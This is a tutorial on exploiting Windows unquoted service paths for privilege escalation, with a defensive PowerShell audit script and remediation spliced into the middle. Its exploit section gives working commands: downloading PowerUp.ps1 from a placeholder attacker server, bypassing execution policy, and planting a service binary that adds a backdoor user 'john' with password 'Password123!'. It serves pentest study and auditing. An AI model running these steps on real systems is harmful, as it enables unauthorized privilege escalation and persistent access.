Unquoted Service Paths

This attack relies on how Windows resolves an executable path when the service's binary path is unquoted and contains spaces.

Introduction

When the service starts, the CreateProcess function executes. This function receives the parameter lpApplicationName, which specifies the path of the binary file. If the provided path is unquoted and includes a space, Windows will try several interpretations of it.

For example, the path C:\Program Files\program folder\binary.exe will be tried in the following order:

C:\Program.exe
C:\Program Files\program.exe
C:\Program Files\program folder\binary.exe

Enumeration

Searching for vulnerable services:

Get-CimInstance -ClassName win32_service | Select Name,State,PathName
wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """

Checking permissions to create files in the candidate paths:

icacls "<path>"

The table below describes the permission masks shown in icacls output:

Mask   Permissions
F      Full access
M      Modify access
RX     Read and execute access
R      Read-only access
W      Write-only access
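The enumeration and permission check above can be combined into one audit pass. The following PowerShell script is an added example, not part of the original page: it lists services whose path is unquoted and contains spaces, derives the intermediate paths Windows would try first, and flags any whose parent directory grants write rights to broad groups. The group list and the remediation command at the end are assumptions for illustration.

```powershell
# Added audit script (not from the original page). Run as an administrator
# for full coverage; group names below are an assumed set of broad principals.
$broadGroups = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')
$writeRights = [System.Security.AccessControl.FileSystemRights]::Write

function Get-UnquotedCandidatePaths {
    param([string]$PathName)
    # Keep only the executable part: everything up to and including ".exe".
    $exeEnd = $PathName.IndexOf('.exe', [StringComparison]::OrdinalIgnoreCase)
    $exe = if ($exeEnd -ge 0) { $PathName.Substring(0, $exeEnd + 4) } else { $PathName }
    $parts = $exe -split ' '
    # Windows tries "C:\Program.exe", then "C:\Program Files\program.exe", ...
    # before the real binary, so each space yields one candidate path.
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Test-BroadWriteAccess {
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    $acl = Get-Acl -LiteralPath $Directory
    foreach ($ace in $acl.Access) {
        # Any Allow ACE for a broad group that carries write bits is a finding.
        if ($ace.AccessControlType -eq 'Allow' -and
            $broadGroups -contains $ace.IdentityReference.Value -and
            ($ace.FileSystemRights -band $writeRights)) { return $true }
    }
    return $false
}

Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.PathName -and $_.PathName -notmatch '^"' -and
                   $_.PathName -match '^[A-Za-z]:\\' -and
                   $_.PathName -notmatch '^[A-Za-z]:\\Windows\\' -and
                   ($_.PathName -split '\.exe')[0] -match ' ' } |
    ForEach-Object {
        $svc = $_
        foreach ($candidate in Get-UnquotedCandidatePaths $svc.PathName) {
            [pscustomobject]@{
                Service     = $svc.Name
                PathName    = $svc.PathName
                Candidate   = $candidate
                DirWritable = Test-BroadWriteAccess (Split-Path -Parent $candidate)
            }
        }
    } | Format-Table -AutoSize

# Remediation: quote the ImagePath so CreateProcess no longer guesses.
# Placeholder service name; the inner quotes must be escaped for sc.exe:
#   sc.exe config "<service_name>" binPath= "\"C:\Program Files\program folder\binary.exe\""
```

Rows with DirWritable set to True are the ones where a low-privileged user could drop a binary at the candidate path; quoting the service path (or tightening the directory ACL) closes the gap.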

Exploit

The process is very similar to the one for Service Binary Hijacking.

Automated Process

It is possible to automate the process using the well-known PowerUp script from the PowerSploit collection:

Downloading PowerUp.ps1:

iwr -uri http://<attacker_http_server>/PowerUp.ps1 -Outfile PowerUp.ps1

Bypassing Execution Policy:

powershell -ep bypass

Importing PowerUp.ps1:

. .\PowerUp.ps1

Enumerate services with unquoted paths:

Get-UnquotedService

Exploiting by creating a malicious binary (the default behavior is to create a new local user called john with the password Password123!):

Write-ServiceBinary -Name '<service_name>' -Path "<binary_path>"

Triggering the exploit by restarting the service:

Restart-Service <service_name>
